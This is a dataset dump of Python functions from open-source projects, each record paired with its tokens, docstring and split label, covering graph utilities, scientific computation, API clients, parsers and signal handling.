https://github.com/nerdvegas/rez/blob/1d3b846d53b5b5404edfe8ddb9083f9ceec8c5e7/src/rez/vendor/pygraph/classes/graph.py#L170-L182
def del_edge(self, edge): """ Remove an edge from the graph. @type edge: tuple @param edge: Edge. """ u, v = edge self.node_neighbors[u].remove(v) self.del_edge_labeling((u, v)) if (u != v): self.node_neighbors[v].remove(u) self.del_edge_labeling((v, u))
[ "def", "del_edge", "(", "self", ",", "edge", ")", ":", "u", ",", "v", "=", "edge", "self", ".", "node_neighbors", "[", "u", "]", ".", "remove", "(", "v", ")", "self", ".", "del_edge_labeling", "(", "(", "u", ",", "v", ")", ")", "if", "(", "u", "!=", "v", ")", ":", "self", ".", "node_neighbors", "[", "v", "]", ".", "remove", "(", "u", ")", "self", ".", "del_edge_labeling", "(", "(", "v", ",", "u", ")", ")" ]
Remove an edge from the graph. @type edge: tuple @param edge: Edge.
[ "Remove", "an", "edge", "from", "the", "graph", "." ]
python
train
26.307692
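A self-contained sketch of the same undirected-edge removal on a plain adjacency dict, without pygraph's edge-labeling bookkeeping:

node_neighbors = {'a': ['b', 'c'], 'b': ['a'], 'c': ['a']}

def del_edge(edge):
    """Remove an undirected edge (u, v) from both adjacency lists."""
    u, v = edge
    node_neighbors[u].remove(v)
    if u != v:               # a self-loop is stored only once
        node_neighbors[v].remove(u)

del_edge(('a', 'b'))
print(node_neighbors)  # {'a': ['c'], 'b': [], 'c': ['a']}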
eng-tools/sfsimodels
sfsimodels/models/soils.py
https://github.com/eng-tools/sfsimodels/blob/65a690ca440d61307f5a9b8478e4704f203a5925/sfsimodels/models/soils.py#L1272-L1312
def discretize_soil_profile(sp, incs=None, target=1.0): """ Splits the soil profile into slices and stores as dictionary :param sp: SoilProfile :param incs: array_like, increments of depth to use for each layer :param target: target depth increment size :return: dict """ if incs is None: incs = np.ones(sp.n_layers) * target dd = {} dd["thickness"] = [] dd["unit_mass"] = [] dd["shear_vel"] = [] cum_thickness = 0 for i in range(sp.n_layers): sl = sp.layer(i + 1) thickness = sp.layer_height(i + 1) n_slices = max(int(thickness / incs[i]), 1) slice_thickness = float(thickness) / n_slices for j in range(n_slices): cum_thickness += slice_thickness if cum_thickness >= sp.gwl: rho = sl.unit_sat_mass saturation = True else: rho = sl.unit_dry_mass saturation = False if hasattr(sl, "get_shear_vel_at_v_eff_stress"): v_eff = sp.vertical_effective_stress(cum_thickness) vs = sl.get_shear_vel_at_v_eff_stress(v_eff, saturation) else: vs = sl.calc_shear_vel(saturation) dd["shear_vel"].append(vs) dd["unit_mass"].append(rho) dd["thickness"].append(slice_thickness) for item in dd: dd[item] = np.array(dd[item]) return dd
[ "def", "discretize_soil_profile", "(", "sp", ",", "incs", "=", "None", ",", "target", "=", "1.0", ")", ":", "if", "incs", "is", "None", ":", "incs", "=", "np", ".", "ones", "(", "sp", ".", "n_layers", ")", "*", "target", "dd", "=", "{", "}", "dd", "[", "\"thickness\"", "]", "=", "[", "]", "dd", "[", "\"unit_mass\"", "]", "=", "[", "]", "dd", "[", "\"shear_vel\"", "]", "=", "[", "]", "cum_thickness", "=", "0", "for", "i", "in", "range", "(", "sp", ".", "n_layers", ")", ":", "sl", "=", "sp", ".", "layer", "(", "i", "+", "1", ")", "thickness", "=", "sp", ".", "layer_height", "(", "i", "+", "1", ")", "n_slices", "=", "max", "(", "int", "(", "thickness", "/", "incs", "[", "i", "]", ")", ",", "1", ")", "slice_thickness", "=", "float", "(", "thickness", ")", "/", "n_slices", "for", "j", "in", "range", "(", "n_slices", ")", ":", "cum_thickness", "+=", "slice_thickness", "if", "cum_thickness", ">=", "sp", ".", "gwl", ":", "rho", "=", "sl", ".", "unit_sat_mass", "saturation", "=", "True", "else", ":", "rho", "=", "sl", ".", "unit_dry_mass", "saturation", "=", "False", "if", "hasattr", "(", "sl", ",", "\"get_shear_vel_at_v_eff_stress\"", ")", ":", "v_eff", "=", "sp", ".", "vertical_effective_stress", "(", "cum_thickness", ")", "vs", "=", "sl", ".", "get_shear_vel_at_v_eff_stress", "(", "v_eff", ",", "saturation", ")", "else", ":", "vs", "=", "sl", ".", "calc_shear_vel", "(", "saturation", ")", "dd", "[", "\"shear_vel\"", "]", ".", "append", "(", "vs", ")", "dd", "[", "\"unit_mass\"", "]", ".", "append", "(", "rho", ")", "dd", "[", "\"thickness\"", "]", ".", "append", "(", "slice_thickness", ")", "for", "item", "in", "dd", ":", "dd", "[", "item", "]", "=", "np", ".", "array", "(", "dd", "[", "item", "]", ")", "return", "dd" ]
Splits the soil profile into slices and stores as dictionary :param sp: SoilProfile :param incs: array_like, increments of depth to use for each layer :param target: target depth increment size :return: dict
[ "Splits", "the", "soil", "profile", "into", "slices", "and", "stores", "as", "dictionary" ]
python
train
34.268293
BerkeleyAutomation/perception
perception/image.py
https://github.com/BerkeleyAutomation/perception/blob/03d9b37dd6b66896cdfe173905c9413c8c3c5df6/perception/image.py#L973-L993
def _check_valid_data(self, data): """Checks that the given data is a uint8 array with one or three channels. Parameters ---------- data : :obj:`numpy.ndarray` The data to check. Raises ------ ValueError If the data is invalid. """ if data.dtype.type is not np.uint8: raise ValueError( 'Illegal data type. Color images only support uint8 arrays') if len(data.shape) != 3 or data.shape[2] != 3: raise ValueError( 'Illegal data type. Color images only support three channels')
[ "def", "_check_valid_data", "(", "self", ",", "data", ")", ":", "if", "data", ".", "dtype", ".", "type", "is", "not", "np", ".", "uint8", ":", "raise", "ValueError", "(", "'Illegal data type. Color images only support uint8 arrays'", ")", "if", "len", "(", "data", ".", "shape", ")", "!=", "3", "or", "data", ".", "shape", "[", "2", "]", "!=", "3", ":", "raise", "ValueError", "(", "'Illegal data type. Color images only support three channels'", ")" ]
Checks that the given data is a uint8 array with one or three channels. Parameters ---------- data : :obj:`numpy.ndarray` The data to check. Raises ------ ValueError If the data is invalid.
[ "Checks", "that", "the", "given", "data", "is", "a", "uint8", "array", "with", "one", "or", "three", "channels", "." ]
python
train
29.761905
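A quick check of the same validation rules with NumPy, assuming standalone arrays rather than the image class in the record:

import numpy as np

def check_color_data(data):
    """Raise ValueError unless data is a uint8 array shaped (H, W, 3)."""
    if data.dtype.type is not np.uint8:
        raise ValueError('Color images only support uint8 arrays')
    if data.ndim != 3 or data.shape[2] != 3:
        raise ValueError('Color images only support three channels')

check_color_data(np.zeros((4, 4, 3), dtype=np.uint8))      # passes silently
# check_color_data(np.zeros((4, 4), dtype=np.float32))     # would raise ValueError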
koalalorenzo/python-digitalocean
digitalocean/Image.py
https://github.com/koalalorenzo/python-digitalocean/blob/d0221b57856fb1e131cafecf99d826f7b07a947c/digitalocean/Image.py#L64-L78
def get_object(cls, api_token, image_id_or_slug): """ Class method that will return an Image object by ID or slug. This method is used to validate the type of the image. If it is a number, it will be considered as an Image ID, instead if it is a string, it will be considered as a slug. """ if cls._is_string(image_id_or_slug): image = cls(token=api_token, slug=image_id_or_slug) image.load(use_slug=True) else: image = cls(token=api_token, id=image_id_or_slug) image.load() return image
[ "def", "get_object", "(", "cls", ",", "api_token", ",", "image_id_or_slug", ")", ":", "if", "cls", ".", "_is_string", "(", "image_id_or_slug", ")", ":", "image", "=", "cls", "(", "token", "=", "api_token", ",", "slug", "=", "image_id_or_slug", ")", "image", ".", "load", "(", "use_slug", "=", "True", ")", "else", ":", "image", "=", "cls", "(", "token", "=", "api_token", ",", "id", "=", "image_id_or_slug", ")", "image", ".", "load", "(", ")", "return", "image" ]
Class method that will return an Image object by ID or slug. This method is used to validate the type of the image. If it is a number, it will be considered as an Image ID, instead if it is a string, it will be considered as a slug.
[ "Class", "method", "that", "will", "return", "an", "Image", "object", "by", "ID", "or", "slug", "." ]
python
valid
40.333333
Kronuz/pyScss
scss/types.py
https://github.com/Kronuz/pyScss/blob/fb32b317f6e2b4b4aad2b86a74844658ac4aa11e/scss/types.py#L1003-L1046
def render(self, compress=False): """Return a rendered representation of the color. If `compress` is true, the shortest possible representation is used; otherwise, named colors are rendered as names and all others are rendered as hex (or with the rgba function). """ if not compress and self.original_literal: return self.original_literal candidates = [] # TODO this assumes CSS resolution is 8-bit per channel, but so does # Ruby. r, g, b, a = self.value r, g, b = int(round(r)), int(round(g)), int(round(b)) # Build a candidate list in order of preference. If `compress` is # True, the shortest candidate is used; otherwise, the first candidate # is used. # Try color name key = r, g, b, a if key in COLOR_LOOKUP: candidates.append(COLOR_LOOKUP[key]) if a == 1: # Hex is always shorter than function notation if all(ch % 17 == 0 for ch in (r, g, b)): candidates.append("#%1x%1x%1x" % (r // 17, g // 17, b // 17)) else: candidates.append("#%02x%02x%02x" % (r, g, b)) else: # Can't use hex notation for RGBA if compress: sp = '' else: sp = ' ' candidates.append("rgba(%d,%s%d,%s%d,%s%.6g)" % (r, sp, g, sp, b, sp, a)) if compress: return min(candidates, key=len) else: return candidates[0]
[ "def", "render", "(", "self", ",", "compress", "=", "False", ")", ":", "if", "not", "compress", "and", "self", ".", "original_literal", ":", "return", "self", ".", "original_literal", "candidates", "=", "[", "]", "# TODO this assumes CSS resolution is 8-bit per channel, but so does", "# Ruby.", "r", ",", "g", ",", "b", ",", "a", "=", "self", ".", "value", "r", ",", "g", ",", "b", "=", "int", "(", "round", "(", "r", ")", ")", ",", "int", "(", "round", "(", "g", ")", ")", ",", "int", "(", "round", "(", "b", ")", ")", "# Build a candidate list in order of preference. If `compress` is", "# True, the shortest candidate is used; otherwise, the first candidate", "# is used.", "# Try color name", "key", "=", "r", ",", "g", ",", "b", ",", "a", "if", "key", "in", "COLOR_LOOKUP", ":", "candidates", ".", "append", "(", "COLOR_LOOKUP", "[", "key", "]", ")", "if", "a", "==", "1", ":", "# Hex is always shorter than function notation", "if", "all", "(", "ch", "%", "17", "==", "0", "for", "ch", "in", "(", "r", ",", "g", ",", "b", ")", ")", ":", "candidates", ".", "append", "(", "\"#%1x%1x%1x\"", "%", "(", "r", "//", "17", ",", "g", "//", "17", ",", "b", "//", "17", ")", ")", "else", ":", "candidates", ".", "append", "(", "\"#%02x%02x%02x\"", "%", "(", "r", ",", "g", ",", "b", ")", ")", "else", ":", "# Can't use hex notation for RGBA", "if", "compress", ":", "sp", "=", "''", "else", ":", "sp", "=", "' '", "candidates", ".", "append", "(", "\"rgba(%d,%s%d,%s%d,%s%.6g)\"", "%", "(", "r", ",", "sp", ",", "g", ",", "sp", ",", "b", ",", "sp", ",", "a", ")", ")", "if", "compress", ":", "return", "min", "(", "candidates", ",", "key", "=", "len", ")", "else", ":", "return", "candidates", "[", "0", "]" ]
Return a rendered representation of the color. If `compress` is true, the shortest possible representation is used; otherwise, named colors are rendered as names and all others are rendered as hex (or with the rgba function).
[ "Return", "a", "rendered", "representation", "of", "the", "color", ".", "If", "compress", "is", "true", "the", "shortest", "possible", "representation", "is", "used", ";", "otherwise", "named", "colors", "are", "rendered", "as", "names", "and", "all", "others", "are", "rendered", "as", "hex", "(", "or", "with", "the", "rgba", "function", ")", "." ]
python
train
34.522727
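The shorthand-hex branch above (`ch % 17 == 0`) works because 0x11 == 17, so #rrggbb collapses to #rgb only when each channel repeats its nibble; a tiny sketch, with the color values made up:

def hex_for_rgb(r, g, b):
    """Prefer 3-digit hex when every channel is a multiple of 17 (0x00, 0x11, ..., 0xff)."""
    if all(ch % 17 == 0 for ch in (r, g, b)):
        return "#%1x%1x%1x" % (r // 17, g // 17, b // 17)
    return "#%02x%02x%02x" % (r, g, b)

print(hex_for_rgb(255, 0, 51))   # '#f03'  (every channel divisible by 17)
print(hex_for_rgb(250, 0, 51))   # '#fa0033'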
cloud9ers/gurumate
environment/lib/python2.7/site-packages/IPython/parallel/controller/sqlitedb.py
https://github.com/cloud9ers/gurumate/blob/075dc74d1ee62a8c6b7a8bf2b271364f01629d1e/environment/lib/python2.7/site-packages/IPython/parallel/controller/sqlitedb.py#L333-L339
def get_record(self, msg_id): """Get a specific Task Record, by msg_id.""" cursor = self._db.execute("""SELECT * FROM %s WHERE msg_id==?"""%self.table, (msg_id,)) line = cursor.fetchone() if line is None: raise KeyError("No such msg: %r"%msg_id) return self._list_to_dict(line)
[ "def", "get_record", "(", "self", ",", "msg_id", ")", ":", "cursor", "=", "self", ".", "_db", ".", "execute", "(", "\"\"\"SELECT * FROM %s WHERE msg_id==?\"\"\"", "%", "self", ".", "table", ",", "(", "msg_id", ",", ")", ")", "line", "=", "cursor", ".", "fetchone", "(", ")", "if", "line", "is", "None", ":", "raise", "KeyError", "(", "\"No such msg: %r\"", "%", "msg_id", ")", "return", "self", ".", "_list_to_dict", "(", "line", ")" ]
Get a specific Task Record, by msg_id.
[ "Get", "a", "specific", "Task", "Record", "by", "msg_id", "." ]
python
test
46.142857
Nekroze/partpy
examples/contacts.py
https://github.com/Nekroze/partpy/blob/dbb7d2fb285464fc43d85bc31f5af46192d301f6/examples/contacts.py#L50-L71
def parse_contact(self): """Parse a top level contact expression, these consist of a name expression a special char and an email expression. The characters found in a name and email expression are returned. """ self.parse_whitespace() name = self.parse_name() # parse a name expression and get the string. if not name: # No name was found so shout it out. raise PartpyError(self, 'Expecting a name') self.parse_whitespace() # allow name and email to be delimited by either a ':' or '-' if not self.match_any_char(':-'): raise PartpyError(self, 'Expecting : or -') self.eat_length(1) self.parse_whitespace() email = self.parse_email() # parse an email and store its string. if not email: raise PartpyError(self, 'Expecting an email address') return (name, email)
[ "def", "parse_contact", "(", "self", ")", ":", "self", ".", "parse_whitespace", "(", ")", "name", "=", "self", ".", "parse_name", "(", ")", "# parse a name expression and get the string.", "if", "not", "name", ":", "# No name was found so shout it out.", "raise", "PartpyError", "(", "self", ",", "'Expecting a name'", ")", "self", ".", "parse_whitespace", "(", ")", "# allow name and email to be delimited by either a ':' or '-'", "if", "not", "self", ".", "match_any_char", "(", "':-'", ")", ":", "raise", "PartpyError", "(", "self", ",", "'Expecting : or -'", ")", "self", ".", "eat_length", "(", "1", ")", "self", ".", "parse_whitespace", "(", ")", "email", "=", "self", ".", "parse_email", "(", ")", "# parse an email and store its string.", "if", "not", "email", ":", "raise", "PartpyError", "(", "self", ",", "'Expecting an email address'", ")", "return", "(", "name", ",", "email", ")" ]
Parse a top level contact expression, these consist of a name expression a special char and an email expression. The characters found in a name and email expression are returned.
[ "Parse", "a", "top", "level", "contact", "expression", "these", "consist", "of", "a", "name", "expression", "a", "special", "char", "and", "an", "email", "expression", "." ]
python
train
41
mpg-age-bioinformatics/AGEpy
AGEpy/kegg.py
https://github.com/mpg-age-bioinformatics/AGEpy/blob/887808a7a2c1504f39ce8d8cb36c15c1721cd29f/AGEpy/kegg.py#L83-L105
def ensembl_to_kegg(organism,kegg_db): """ Looks up KEGG mappings of KEGG ids to ensembl ids :param organism: an organisms as listed in organismsKEGG() :param kegg_db: a matching KEGG db as reported in databasesKEGG :returns: a Pandas dataframe of with 'KEGGid' and 'ENSid'. """ print("KEGG API: http://rest.genome.jp/link/"+kegg_db+"/"+organism) sys.stdout.flush() kegg_ens=urlopen("http://rest.genome.jp/link/"+kegg_db+"/"+organism).read() kegg_ens=kegg_ens.split("\n") final=[] for i in kegg_ens: final.append(i.split("\t")) df=pd.DataFrame(final[0:len(final)-1])[[0,1]] ens_id=pd.DataFrame(df[1].str.split(":").tolist())[1] df=pd.concat([df,ens_id],axis=1) df.columns=['KEGGid','ensDB','ENSid'] df=df[['KEGGid','ENSid']] return df
[ "def", "ensembl_to_kegg", "(", "organism", ",", "kegg_db", ")", ":", "print", "(", "\"KEGG API: http://rest.genome.jp/link/\"", "+", "kegg_db", "+", "\"/\"", "+", "organism", ")", "sys", ".", "stdout", ".", "flush", "(", ")", "kegg_ens", "=", "urlopen", "(", "\"http://rest.genome.jp/link/\"", "+", "kegg_db", "+", "\"/\"", "+", "organism", ")", ".", "read", "(", ")", "kegg_ens", "=", "kegg_ens", ".", "split", "(", "\"\\n\"", ")", "final", "=", "[", "]", "for", "i", "in", "kegg_ens", ":", "final", ".", "append", "(", "i", ".", "split", "(", "\"\\t\"", ")", ")", "df", "=", "pd", ".", "DataFrame", "(", "final", "[", "0", ":", "len", "(", "final", ")", "-", "1", "]", ")", "[", "[", "0", ",", "1", "]", "]", "ens_id", "=", "pd", ".", "DataFrame", "(", "df", "[", "1", "]", ".", "str", ".", "split", "(", "\":\"", ")", ".", "tolist", "(", ")", ")", "[", "1", "]", "df", "=", "pd", ".", "concat", "(", "[", "df", ",", "ens_id", "]", ",", "axis", "=", "1", ")", "df", ".", "columns", "=", "[", "'KEGGid'", ",", "'ensDB'", ",", "'ENSid'", "]", "df", "=", "df", "[", "[", "'KEGGid'", ",", "'ENSid'", "]", "]", "return", "df" ]
Looks up KEGG mappings of KEGG ids to ensembl ids :param organism: an organisms as listed in organismsKEGG() :param kegg_db: a matching KEGG db as reported in databasesKEGG :returns: a Pandas dataframe of with 'KEGGid' and 'ENSid'.
[ "Looks", "up", "KEGG", "mappings", "of", "KEGG", "ids", "to", "ensembl", "ids" ]
python
train
34.565217
tommyod/streprogen
streprogen/modeling.py
https://github.com/tommyod/streprogen/blob/21b903618e8b2d398bceb394d18d7c74ca984def/streprogen/modeling.py#L65-L91
def generate_one(self): """Generate a single element. Returns ------- element An element from the domain. Examples ------- >>> generator = RepellentGenerator(['a', 'b']) >>> gen_item = generator.generate_one() >>> gen_item in ['a', 'b'] True """ # Get the weights for all items in the domain weights = [self.probability_func(self.generated[element]) for element in self.domain] # Sample from the domain using the weights element = random.choices(self.domain, weights=weights)[0] # Update the generated values and return self.generated[element] += 1 return element
[ "def", "generate_one", "(", "self", ")", ":", "# Get the weights for all items in the domain", "weights", "=", "[", "self", ".", "probability_func", "(", "self", ".", "generated", "[", "element", "]", ")", "for", "element", "in", "self", ".", "domain", "]", "# Sample from the domain using the weights", "element", "=", "random", ".", "choices", "(", "self", ".", "domain", ",", "weights", "=", "weights", ")", "[", "0", "]", "# Update the generated values and return", "self", ".", "generated", "[", "element", "]", "+=", "1", "return", "element" ]
Generate a single element. Returns ------- element An element from the domain. Examples ------- >>> generator = RepellentGenerator(['a', 'b']) >>> gen_item = generator.generate_one() >>> gen_item in ['a', 'b'] True
[ "Generate", "a", "single", "element", ".", "Returns", "-------", "element", "An", "element", "from", "the", "domain", ".", "Examples", "-------", ">>>", "generator", "=", "RepellentGenerator", "(", "[", "a", "b", "]", ")", ">>>", "gen_item", "=", "generator", ".", "generate_one", "()", ">>>", "gen_item", "in", "[", "a", "b", "]", "True" ]
python
train
27.037037
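A compact sketch of the same repellent-sampling idea with the standard library; the decay function used for the weights here is an assumption, not streprogen's default probability_func:

import random
from collections import Counter

domain = ['a', 'b']
counts = Counter()

def generate_one():
    # Items picked often get smaller weights, so the sampler "repels" repeats.
    weights = [1.0 / (1 + counts[item]) for item in domain]
    item = random.choices(domain, weights=weights)[0]
    counts[item] += 1
    return item

print([generate_one() for _ in range(6)])  # e.g. ['b', 'a', 'b', 'a', 'a', 'b']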
learningequality/ricecooker
ricecooker/utils/metadata_provider.py
https://github.com/learningequality/ricecooker/blob/2f0385282500cb77ef2894646c6f9ce11bd7a853/ricecooker/utils/metadata_provider.py#L255-L268
def get_channel_info(self): """ Returns the first data row from Channel.csv """ csv_filename = get_metadata_file_path(channeldir=self.channeldir, filename=self.channelinfo) csv_lines = _read_csv_lines(csv_filename) dict_reader = csv.DictReader(csv_lines) channel_csvs_list = list(dict_reader) channel_csv = channel_csvs_list[0] if len(channel_csvs_list) > 1: raise ValueError('Found multiple channel rows in ' + self.channelinfo) channel_cleaned = _clean_dict(channel_csv) channel_info = self._map_channel_row_to_dict(channel_cleaned) return channel_info
[ "def", "get_channel_info", "(", "self", ")", ":", "csv_filename", "=", "get_metadata_file_path", "(", "channeldir", "=", "self", ".", "channeldir", ",", "filename", "=", "self", ".", "channelinfo", ")", "csv_lines", "=", "_read_csv_lines", "(", "csv_filename", ")", "dict_reader", "=", "csv", ".", "DictReader", "(", "csv_lines", ")", "channel_csvs_list", "=", "list", "(", "dict_reader", ")", "channel_csv", "=", "channel_csvs_list", "[", "0", "]", "if", "len", "(", "channel_csvs_list", ")", ">", "1", ":", "raise", "ValueError", "(", "'Found multiple channel rows in '", "+", "self", ".", "channelinfo", ")", "channel_cleaned", "=", "_clean_dict", "(", "channel_csv", ")", "channel_info", "=", "self", ".", "_map_channel_row_to_dict", "(", "channel_cleaned", ")", "return", "channel_info" ]
Returns the first data row from Channel.csv
[ "Returns", "the", "first", "data", "row", "from", "Channel", ".", "csv" ]
python
train
46.428571
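A stripped-down sketch of reading a single-row metadata CSV with DictReader, using a made-up file layout rather than ricecooker's real Channel.csv columns:

import csv
import io

csv_text = "Title,Description\nMy Channel,Sample content\n"

rows = list(csv.DictReader(io.StringIO(csv_text)))
if len(rows) > 1:
    raise ValueError('Found multiple channel rows')
channel_info = dict(rows[0])
print(channel_info)  # {'Title': 'My Channel', 'Description': 'Sample content'}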
mozilla/socorrolib
socorrolib/lib/task_manager.py
https://github.com/mozilla/socorrolib/blob/4ec08c6a4ee2c8a69150268afdd324f5f22b90c8/socorrolib/lib/task_manager.py#L27-L53
def respond_to_SIGTERM(signal_number, frame, target=None): """ these classes are instrumented to respond to a KeyboardInterrupt by cleanly shutting down. This function, when given as a handler to for a SIGTERM event, will make the program respond to a SIGTERM as neatly as it responds to ^C. This function is used in registering a signal handler from the signal module. It should be registered for any signal for which the desired behavior is to kill the application: signal.signal(signal.SIGTERM, respondToSIGTERM) signal.signal(signal.SIGHUP, respondToSIGTERM) parameters: signal_number - unused in this function but required by the api. frame - unused in this function but required by the api. target - an instance of a class that has a member called 'task_manager' that is a derivative of the TaskManager class below. """ if target: target.config.logger.info('detected SIGTERM') # by setting the quit flag to true, any calls to the 'quit_check' # method that is so liberally passed around in this framework will # result in raising the quit exception. The current quit exception # is KeyboardInterrupt target.task_manager.quit = True else: raise KeyboardInterrupt
[ "def", "respond_to_SIGTERM", "(", "signal_number", ",", "frame", ",", "target", "=", "None", ")", ":", "if", "target", ":", "target", ".", "config", ".", "logger", ".", "info", "(", "'detected SIGTERM'", ")", "# by setting the quit flag to true, any calls to the 'quit_check'", "# method that is so liberally passed around in this framework will", "# result in raising the quit exception. The current quit exception", "# is KeyboardInterrupt", "target", ".", "task_manager", ".", "quit", "=", "True", "else", ":", "raise", "KeyboardInterrupt" ]
these classes are instrumented to respond to a KeyboardInterrupt by cleanly shutting down. This function, when given as a handler to for a SIGTERM event, will make the program respond to a SIGTERM as neatly as it responds to ^C. This function is used in registering a signal handler from the signal module. It should be registered for any signal for which the desired behavior is to kill the application: signal.signal(signal.SIGTERM, respondToSIGTERM) signal.signal(signal.SIGHUP, respondToSIGTERM) parameters: signal_number - unused in this function but required by the api. frame - unused in this function but required by the api. target - an instance of a class that has a member called 'task_manager' that is a derivative of the TaskManager class below.
[ "these", "classes", "are", "instrumented", "to", "respond", "to", "a", "KeyboardInterrupt", "by", "cleanly", "shutting", "down", ".", "This", "function", "when", "given", "as", "a", "handler", "to", "for", "a", "SIGTERM", "event", "will", "make", "the", "program", "respond", "to", "a", "SIGTERM", "as", "neatly", "as", "it", "responds", "to", "^C", "." ]
python
train
48.259259
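Registering a handler of this shape with the standard signal module looks roughly like this on a POSIX system; `respond_to_sigterm` here is a simplified stand-in that only exercises the fallback branch (raising KeyboardInterrupt):

import os
import signal

def respond_to_sigterm(signal_number, frame):
    # Mirror the fallback branch above: treat SIGTERM like Ctrl-C.
    raise KeyboardInterrupt

signal.signal(signal.SIGTERM, respond_to_sigterm)

try:
    os.kill(os.getpid(), signal.SIGTERM)   # deliver the signal to ourselves
except KeyboardInterrupt:
    print("clean shutdown path taken")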
ondryaso/pi-rc522
pirc522/util.py
https://github.com/ondryaso/pi-rc522/blob/9d9103e9701c105ba2348155e91f21ef338c4bd3/pirc522/util.py#L53-L67
def deauth(self): """ Resets authentication info. Calls stop_crypto() if RFID is in auth state """ self.method = None self.key = None self.last_auth = None if self.debug: print("Changing auth key and method to None") if self.rfid.authed: self.rfid.stop_crypto() if self.debug: print("Stopping crypto1")
[ "def", "deauth", "(", "self", ")", ":", "self", ".", "method", "=", "None", "self", ".", "key", "=", "None", "self", ".", "last_auth", "=", "None", "if", "self", ".", "debug", ":", "print", "(", "\"Changing auth key and method to None\"", ")", "if", "self", ".", "rfid", ".", "authed", ":", "self", ".", "rfid", ".", "stop_crypto", "(", ")", "if", "self", ".", "debug", ":", "print", "(", "\"Stopping crypto1\"", ")" ]
Resets authentication info. Calls stop_crypto() if RFID is in auth state
[ "Resets", "authentication", "info", ".", "Calls", "stop_crypto", "()", "if", "RFID", "is", "in", "auth", "state" ]
python
train
27.066667
spyder-ide/spyder
spyder/utils/codeanalysis.py
https://github.com/spyder-ide/spyder/blob/f76836ce1b924bcc4efd3f74f2960d26a4e528e0/spyder/utils/codeanalysis.py#L96-L113
def get_checker_executable(name): """Return checker executable in the form of a list of arguments for subprocess.Popen""" if programs.is_program_installed(name): # Checker is properly installed return [name] else: path1 = programs.python_script_exists(package=None, module=name+'_script') path2 = programs.python_script_exists(package=None, module=name) if path1 is not None: # checker_script.py is available # Checker script is available but has not been installed # (this may work with pyflakes) return [sys.executable, path1] elif path2 is not None: # checker.py is available # Checker package is available but its script has not been # installed (this works with pycodestyle but not with pyflakes) return [sys.executable, path2]
[ "def", "get_checker_executable", "(", "name", ")", ":", "if", "programs", ".", "is_program_installed", "(", "name", ")", ":", "# Checker is properly installed\r", "return", "[", "name", "]", "else", ":", "path1", "=", "programs", ".", "python_script_exists", "(", "package", "=", "None", ",", "module", "=", "name", "+", "'_script'", ")", "path2", "=", "programs", ".", "python_script_exists", "(", "package", "=", "None", ",", "module", "=", "name", ")", "if", "path1", "is", "not", "None", ":", "# checker_script.py is available\r", "# Checker script is available but has not been installed\r", "# (this may work with pyflakes)\r", "return", "[", "sys", ".", "executable", ",", "path1", "]", "elif", "path2", "is", "not", "None", ":", "# checker.py is available\r", "# Checker package is available but its script has not been\r", "# installed (this works with pycodestyle but not with pyflakes)\r", "return", "[", "sys", ".", "executable", ",", "path2", "]" ]
Return checker executable in the form of a list of arguments for subprocess.Popen
[ "Return", "checker", "executable", "in", "the", "form", "of", "a", "list", "of", "arguments", "for", "subprocess", ".", "Popen" ]
python
train
50.888889
idlesign/srptools
srptools/context.py
https://github.com/idlesign/srptools/blob/eb08a27137d3216e41d63bbeafbac79f43881a6a/srptools/context.py#L129-L141
def get_client_premaster_secret(self, password_hash, server_public, client_private, common_secret): """S = (B - (k * g^x)) ^ (a + (u * x)) % N :param int server_public: :param int password_hash: :param int client_private: :param int common_secret: :rtype: int """ password_verifier = self.get_common_password_verifier(password_hash) return pow( (server_public - (self._mult * password_verifier)), (client_private + (common_secret * password_hash)), self._prime)
[ "def", "get_client_premaster_secret", "(", "self", ",", "password_hash", ",", "server_public", ",", "client_private", ",", "common_secret", ")", ":", "password_verifier", "=", "self", ".", "get_common_password_verifier", "(", "password_hash", ")", "return", "pow", "(", "(", "server_public", "-", "(", "self", ".", "_mult", "*", "password_verifier", ")", ")", ",", "(", "client_private", "+", "(", "common_secret", "*", "password_hash", ")", ")", ",", "self", ".", "_prime", ")" ]
S = (B - (k * g^x)) ^ (a + (u * x)) % N :param int server_public: :param int password_hash: :param int client_private: :param int common_secret: :rtype: int
[ "S", "=", "(", "B", "-", "(", "k", "*", "g^x", "))", "^", "(", "a", "+", "(", "u", "*", "x", "))", "%", "N" ]
python
train
42
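The premaster-secret formula quoted in the docstring, S = (B - (k * g^x)) ^ (a + (u * x)) % N, can be reproduced with plain modular exponentiation. The numbers below are toy values chosen only for illustration; real SRP uses a large safe prime and hashed inputs.

N = 23   # toy prime; real SRP uses a large safe prime
g = 5    # generator
k = 3    # multiplier parameter
x = 6    # hashed password (toy value)
a = 4    # client private ephemeral
B = 19   # server public ephemeral (toy value)
u = 7    # scrambling value derived from both public keys

v = pow(g, x, N)                   # password verifier g^x mod N
S = pow(B - k * v, a + u * x, N)   # client premaster secret
print(S)                           # 2 for these toy inputs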
rcsb/mmtf-python
mmtf/converters/converters.py
https://github.com/rcsb/mmtf-python/blob/899bb877ca1b32a9396803d38c5bf38a2520754e/mmtf/converters/converters.py#L34-L44
def decode_chain_list(in_bytes): """Convert a list of bytes to a list of strings. Each string is of length mmtf.CHAIN_LEN :param in_bytes: the input bytes :return the decoded list of strings""" tot_strings = len(in_bytes) // mmtf.utils.constants.CHAIN_LEN out_strings = [] for i in range(tot_strings): out_s = in_bytes[i * mmtf.utils.constants.CHAIN_LEN:i * mmtf.utils.constants.CHAIN_LEN + mmtf.utils.constants.CHAIN_LEN] out_strings.append(out_s.decode("ascii").strip(mmtf.utils.constants.NULL_BYTE)) return out_strings
[ "def", "decode_chain_list", "(", "in_bytes", ")", ":", "tot_strings", "=", "len", "(", "in_bytes", ")", "//", "mmtf", ".", "utils", ".", "constants", ".", "CHAIN_LEN", "out_strings", "=", "[", "]", "for", "i", "in", "range", "(", "tot_strings", ")", ":", "out_s", "=", "in_bytes", "[", "i", "*", "mmtf", ".", "utils", ".", "constants", ".", "CHAIN_LEN", ":", "i", "*", "mmtf", ".", "utils", ".", "constants", ".", "CHAIN_LEN", "+", "mmtf", ".", "utils", ".", "constants", ".", "CHAIN_LEN", "]", "out_strings", ".", "append", "(", "out_s", ".", "decode", "(", "\"ascii\"", ")", ".", "strip", "(", "mmtf", ".", "utils", ".", "constants", ".", "NULL_BYTE", ")", ")", "return", "out_strings" ]
Convert a list of bytes to a list of strings. Each string is of length mmtf.CHAIN_LEN :param in_bytes: the input bytes :return the decoded list of strings
[ "Convert", "a", "list", "of", "bytes", "to", "a", "list", "of", "strings", ".", "Each", "string", "is", "of", "length", "mmtf", ".", "CHAIN_LEN" ]
python
train
50.545455
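A standalone sketch of the fixed-width decoding idea from the record above, not the mmtf package itself; CHAIN_LEN = 4 and the null-byte padding character are assumptions made for illustration.

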